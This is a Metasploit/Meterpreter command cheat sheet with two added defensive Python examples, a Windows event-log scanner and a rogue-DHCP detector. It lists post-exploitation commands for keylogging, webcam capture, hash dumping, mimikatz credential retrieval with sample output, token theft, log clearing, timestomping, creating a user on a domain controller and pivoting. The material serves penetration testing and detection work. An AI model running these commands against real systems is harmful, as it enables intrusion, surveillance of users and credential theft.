Metasploit
Meterpreter Shell
Run in a Docker:
docker run --rm -it metasploitframework/metasploit-framework ./msfconsole
docker run --rm -it -v "${HOME}/.msf:/home/msf/.msf4" -p 4444:4444 metasploitframework/metasploit-framework ./msfconsole
Using a bash function (the port argument is quoted so that a malformed value cannot turn into extra docker arguments):
# Start msfconsole in Docker, keeping state under ${HOME}/.msf.
# Note: this mounts ${HOME}/.msf over the whole container home directory (/home/msf/),
# whereas the one-liner above mounts it at /home/msf/.msf4 only.
# With no argument, listener port 4444 is published; otherwise the given port.
function msfconsole {
    echo "Shared storage at ${HOME}/.msf"
    if [ -z "$1" ]
    then
        echo "forwarding 4444 -> 4444"
        docker run --rm -it -v "${HOME}/.msf:/home/msf/" -p 4444:4444 metasploitframework/metasploit-framework ./msfconsole
    else
        echo "forwarding $1 -> $1"
        docker run --rm -it -v "${HOME}/.msf:/home/msf/" -p "$1:$1" metasploitframework/metasploit-framework ./msfconsole
    fi
}
# msfvenom wrapper: the current directory is mounted at /data inside the container,
# so output must be written there (-o /data/<file>) to end up on the host.
alias msfvenom='echo remember to save to -o /data/something ; docker run --rm -it -v "${HOME}/.msf:/home/msf/" -v "${PWD}:/data" metasploitframework/metasploit-framework ./msfvenom'
Metasploit Console Basics
Search for a module:
msf > search [regex]
Specify an exploit to use:
msf > use exploit/[ExploitPath]
Specify a payload to use:
msf > set PAYLOAD [PayloadPath]
Show options for the current module:
msf > show options
Set options:
msf > set [Option] [Value]
Start exploit:
msf > exploit
Metasploit shell upgrade:
sessions -u
System Commands
cd Change directory
lcd Change directory on local (attacker's) machine
clearev Clear the event log
download Copy a file from the target machine to the local (attacker's) machine
drop_token Relinquishes any active impersonation token.
edit Open a file in the default editor (typically vi)
execute Execute a command with the privileges of the process the Meterpreter is loaded in
getenv Get one or more environment variable values
getpid Get the current process identifier that Meterpreter is running inside
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that Meterpreter is running as
kill Terminate a process
ps List running processes
migrate Jump to a given destination process ID
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
upload Copy a file from the local machine to the target machine
timestomp Alter NTFS file timestamps
Incognito Commands
meterpreter > load incognito
add_group_user Attempt to add a user to a global group with all tokens
add_localgroup_user Attempt to add a user to a local group with all tokens
add_user Attempt to add a user with all tokens
impersonate_token Impersonate specified token
list_tokens List tokens available under current user context
snarf_hashes Snarf challenge/response hashes for every token
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token DOMAIN\User
meterpreter > add_user newuser password -h 192.168.20.30 #Attempt to create user on Domain Controller
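From the defender's side, several of the commands in the System Commands and Incognito sections above (clearev, timestomp, migrate, add_user, add_group_user, add_localgroup_user) leave characteristic Windows Security or Sysmon events. The following is an added example, not part of the original cheat sheet or of Metasploit: a small log scanner that maps those commands to the documented event IDs and flags hosts where more than one indicator appears. The event IDs are the standard Windows/Sysmon ones; the JSON record layout (host, channel, event_id, ts, detail) is an assumed collector export format, and the lines in SAMPLE_LOG are constructed for the example.

```python
"""Added example (not from the original page): map Meterpreter post-exploitation
commands to the Windows Security / Sysmon events they commonly produce and scan
a log export for them. Record layout is an assumption; sample data is constructed."""
import json

# (channel, event ID) -> (Meterpreter command, what the event records)
INDICATORS = {
    ("Security", 1102): ("clearev", "the audit log was cleared"),
    ("Security", 4720): ("add_user", "a user account was created"),
    ("Security", 4728): ("add_group_user", "member added to a security-enabled global group"),
    ("Security", 4732): ("add_localgroup_user", "member added to a security-enabled local group"),
    ("Sysmon", 8): ("migrate", "CreateRemoteThread into another process (injection)"),
    ("Sysmon", 2): ("timestomp", "a process changed a file creation time"),
}


def parse_record(line: str) -> dict:
    """Decode one JSON log record; event_id is normalised to int."""
    rec = json.loads(line)
    rec["event_id"] = int(rec["event_id"])
    return rec


def scan(lines):
    """Return one alert per record whose (channel, event_id) is a known indicator."""
    alerts = []
    for line in lines:
        rec = parse_record(line)
        hit = INDICATORS.get((rec["channel"], rec["event_id"]))
        if hit is None:
            continue
        cmd, meaning = hit
        alerts.append({
            "host": rec["host"],
            "ts": rec["ts"],
            "event": f'{rec["channel"]}/{rec["event_id"]}',
            "meterpreter_cmd": cmd,
            "meaning": meaning,
            "detail": rec.get("detail", ""),
        })
    return alerts


def hosts_to_escalate(alerts, min_distinct=2):
    """Hosts that show at least min_distinct different indicator types."""
    seen = {}
    for a in alerts:
        seen.setdefault(a["host"], set()).add(a["meterpreter_cmd"])
    return sorted(h for h, cmds in seen.items() if len(cmds) >= min_distinct)


# Constructed sample log: two benign records and four indicator records.
SAMPLE_LOG = [
    '{"host": "WS01", "channel": "Security", "event_id": 4624, "ts": 100, "detail": "logon type 2"}',
    '{"host": "WS01", "channel": "Sysmon", "event_id": 8, "ts": 101, "detail": "SourceImage: loader.exe TargetImage: explorer.exe"}',
    '{"host": "WS01", "channel": "Security", "event_id": 1102, "ts": 102, "detail": "audit log cleared"}',
    '{"host": "DC01", "channel": "Security", "event_id": 4720, "ts": 103, "detail": "TargetUserName: newuser"}',
    '{"host": "WS02", "channel": "Sysmon", "event_id": 2, "ts": 104, "detail": "TargetFilename: C:/Temp/a.exe"}',
    '{"host": "WS02", "channel": "Sysmon", "event_id": 1, "ts": 105, "detail": "process create"}',
]

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f'{a["host"]} {a["event"]:<14} {a["meterpreter_cmd"]:<20} {a["meaning"]}')
    print("escalate:", hosts_to_escalate(scan(SAMPLE_LOG)))
```

A single 4720 on a domain controller is routine; the value of the correlation step is that a host showing both process injection and a cleared audit log within the same export is rarely benign, which is why WS01 is escalated while DC01 and WS02 are left as single alerts.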
User Interface Commands
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds that the GUI of the target machine has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the Meterpreter's current desktop
uictl [enable/disable] [keyboard/mouse] Enable/disable either the mouse or keyboard of the target machine
Webcam Commands
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
screengrab Attempt to grab screen shot from process's active desktop
Elevate Commands
meterpreter > use priv
meterpreter > getsystem
meterpreter > getuid
getsystem Attempt to elevate your privilege to that of local system.
Password Database Commands
hashdump Dumps the contents of the SAM database
Mimikatz Commands
meterpreter > load mimikatz
kerberos Attempt to retrieve kerberos creds
livessp Attempt to retrieve livessp creds
mimikatz_command Run a custom command
msv Attempt to retrieve msv creds (hashes)
ssp Attempt to retrieve ssp creds
tspkg Attempt to retrieve tspkg creds
wdigest Attempt to retrieve wdigest creds
Sniffer Commands
sniffer_dump Retrieve captured packet data to PCAP file
sniffer_interfaces Enumerate all sniffable network interfaces
sniffer_release Free captured packets on a specific interface instead of downloading them
sniffer_start Start packet capture on a specific interface
sniffer_stats View statistics of an active capture
sniffer_stop Stop packet capture on a specific interface
Lanattacks
dhcp_load_options Load DHCP options from a datastore
dhcp_log Log DHCP server activity
dhcp_reset Reset the DHCP server
dhcp_set_option Set a DHCP server option
dhcp_start Start the DHCP server
dhcp_stop Stop the DHCP server
tftp_add_file Add a file to the TFTP server
tftp_reset Reset the TFTP server
tftp_start Start the TFTP server
tftp_stop Stop the TFTP server
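The dhcp_start command above runs a DHCP server from the compromised host. On the wire that shows up as DHCP OFFERs whose server identifier (option 54) is not one of the network's known DHCP servers, which is the check a network defender wants. The following is an added example, not part of the original cheat sheet or of Metasploit: a standalone DHCP OFFER decoder (fixed BOOTP header plus option TLVs per RFC 2131/2132) and an allowlist check on the server identifier. The packet produced by sample_offer() and every address in it are constructed for the example.

```python
"""Added example (not from the original page): decode a DHCP OFFER and decide
whether it came from an approved server. Sample packet and addresses are constructed."""
import ipaddress
import struct
from typing import Optional

DHCP_MAGIC = b"\x63\x82\x53\x63"   # RFC 2131 magic cookie that precedes the options
BOOTREPLY = 2                      # op field value for server -> client messages
DHCP_OFFER = 2                     # option 53 value for OFFER


def _packed(ip: str) -> bytes:
    return ipaddress.IPv4Address(ip).packed


def parse_dhcp(payload: bytes) -> dict:
    """Decode the fixed BOOTP header and the option TLVs (RFC 2131 / 2132)."""
    if len(payload) < 240 or payload[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP message")
    op, _htype, hlen, _hops, xid = struct.unpack_from("!BBBBI", payload, 0)
    msg = {
        "op": op,
        "xid": xid,
        "yiaddr": str(ipaddress.IPv4Address(payload[16:20])),   # address being offered
        "siaddr": str(ipaddress.IPv4Address(payload[20:24])),   # next-server address
        "chaddr": payload[28:28 + hlen].hex(":"),               # client hardware address
        "options": {},
    }
    i = 240
    while i < len(payload):
        code = payload[i]
        if code == 255:            # end option
            break
        if code == 0:              # pad option carries no length byte
            i += 1
            continue
        length = payload[i + 1]
        msg["options"][code] = payload[i + 2:i + 2 + length]
        i += 2 + length
    return msg


def classify_offer(payload: bytes, allowed_servers) -> Optional[dict]:
    """Return a verdict for an OFFER, or None if the packet is not an OFFER."""
    msg = parse_dhcp(payload)
    opts = msg["options"]
    if msg["op"] != BOOTREPLY or opts.get(53) != bytes([DHCP_OFFER]) or 54 not in opts:
        return None
    server = str(ipaddress.IPv4Address(opts[54]))
    router = str(ipaddress.IPv4Address(opts[3])) if 3 in opts else None
    return {
        "server": server,
        "offered_ip": msg["yiaddr"],
        "router": router,
        "client": msg["chaddr"],
        "rogue": server not in set(allowed_servers),
    }


def sample_offer(xid: int, client_mac: str, offered_ip: str, server_ip: str, router_ip: str) -> bytes:
    """Build a minimal OFFER so the parser can be exercised offline (constructed data)."""
    hdr = struct.pack("!BBBBIHH", BOOTREPLY, 1, 6, 0, xid, 0, 0)   # op, htype=ethernet, hlen, hops, xid, secs, flags
    hdr += b"\x00" * 4 + _packed(offered_ip) + _packed(server_ip) + b"\x00" * 4   # ciaddr, yiaddr, siaddr, giaddr
    hdr += bytes.fromhex(client_mac.replace(":", "")).ljust(16, b"\x00")       # chaddr (16 bytes)
    hdr += b"\x00" * (64 + 128)                                                # sname, file
    opts = DHCP_MAGIC
    opts += bytes([53, 1, DHCP_OFFER])                    # message type
    opts += bytes([54, 4]) + _packed(server_ip)           # server identifier
    opts += bytes([3, 4]) + _packed(router_ip)            # router
    opts += bytes([51, 4]) + struct.pack("!I", 3600)      # lease time
    opts += b"\xff"                                       # end
    return hdr + opts


if __name__ == "__main__":
    KNOWN_DHCP_SERVERS = {"192.168.20.1"}                 # constructed allowlist
    pkt = sample_offer(0x3903F326, "aa:bb:cc:dd:ee:ff", "192.168.20.77", "192.168.20.99", "192.168.20.99")
    print(classify_offer(pkt, KNOWN_DHCP_SERVERS))
```

In practice the payload would come from a capture or a switch's DHCP-snooping log rather than from sample_offer(); the decoder and the allowlist check are the same either way, and an OFFER whose router option also points at an unknown host is the usual sign that traffic is being steered through the rogue server.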
Pivoting
Use Meterpreter Session to Pivot onto other Systems
meterpreter > run get_local_subnets
meterpreter > background
msf exploit(handler) > route add <localsubnet> <netmask> [session]
msf exploit(handler) > run
ipconfig Show network interface information
portfwd Forward packets through TCP session
route Manage/view the system's routing table
Useful Auxiliary Modules
Port Scanner:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run
DNS Enumeration:
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run
FTP Server:
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run
Proxy Server:
msf > use auxiliary/server/socks4
msf > run
Managing Sessions
Run the exploit expecting a single session that is immediately backgrounded:
msf > exploit -z
Run the exploit in the background expecting one or more sessions that are immediately backgrounded:
msf > exploit -j
List all current jobs (usually exploit listeners):
msf > jobs -l
Kill a job:
msf > jobs -k [JobID]
Managing Multiple Sessions
List all backgrounded sessions:
msf > sessions -l
Interact with a backgrounded session:
msf > sessions -i [SessionID]
Background the current interactive session:
meterpreter > <Ctrl+Z>
or
meterpreter > background
Routing Through Sessions:
All modules (exploits/post/aux) against the target subnet mask will be pivoted through this session.
msf > route add [Subnet to Route To] [Subnet Netmask] [SessionID]
Post Exploitation
Migrating processes
Migrate Meterpreter into another process (by PID):
meterpreter > migrate 1450
Privilege Escalation
Load extensions:
meterpreter > load mimikatz
meterpreter > load incognito
Privilege Escalation:
meterpreter > use priv
meterpreter > getsystem
meterpreter > getuid
Token Impersonation:
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token DOMAIN\User
Steal Token:
meterpreter > steal_token [user PID]
Attempt to retrieve credentials with the mimikatz extension (msv, kerberos, livessp, ssp, tspkg); the output below is from a session running as SYSTEM:
meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate NT AUTHORITY NETWORK SERVICE mod_memory::searchMemory NT5 (0x00000012) There are no more files. n.a. (msv1_0 KO)
0;997 Negotiate NT AUTHORITY LOCAL SERVICE mod_memory::searchMemory NT5 (0x00000012) There are no more files. n.a. (msv1_0 KO)
0;47269 NTLM mod_memory::searchMemory NT5 (0x00000012) There are no more files. n.a. (msv1_0 KO)
0;999 NTLM THINC RALPH$ mod_memory::searchMemory NT5 (0x00000012) There are no more files. n.a. (msv1_0 KO)
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate NT AUTHORITY NETWORK SERVICE mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (kerberos KO)
0;997 Negotiate NT AUTHORITY LOCAL SERVICE mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (kerberos KO)
0;47269 NTLM mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (kerberos KO)
0;999 NTLM THINC RALPH$ mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (kerberos KO)
meterpreter > livessp
[+] Running as SYSTEM
[*] Retrieving livessp credentials
livessp credentials
===================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate NT AUTHORITY NETWORK SERVICE mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (livessp KO)
0;997 Negotiate NT AUTHORITY LOCAL SERVICE mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (livessp KO)
0;47269 NTLM mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (livessp KO)
0;999 NTLM THINC RALPH$ mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (livessp KO)
meterpreter > ssp
[+] Running as SYSTEM
[*] Retrieving ssp credentials
ssp credentials
===============
AuthID Package Domain User Password
------ ------- ------ ---- --------
meterpreter > tspkg
[+] Running as SYSTEM
[*] Retrieving tspkg credentials
tspkg credentials
=================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate NT AUTHORITY NETWORK SERVICE mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (tspkg KO)
0;997 Negotiate NT AUTHORITY LOCAL SERVICE mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (tspkg KO)
0;47269 NTLM mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (tspkg KO)
0;999 NTLM THINC RALPH$ mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (tspkg KO)
meterpreter >
Pivot into internal network
Attempt to create user on Domain Controller:
meterpreter > add_user newuser password -h 192.168.20.30
Pivot to other systems in the local network:
meterpreter > run get_local_subnets
meterpreter > background
msf exploit(handler) > route add <localsubnet> <netmask> [session]
msf exploit(handler) > run
Autopwn
Download the Autopwn module:
cd /opt/metasploit/apps/pro/msf3/plugins/
wget 'https://raw.github.com/neinwechter/metasploit-framework/autopwn-modules/plugins/db_autopwn.rb'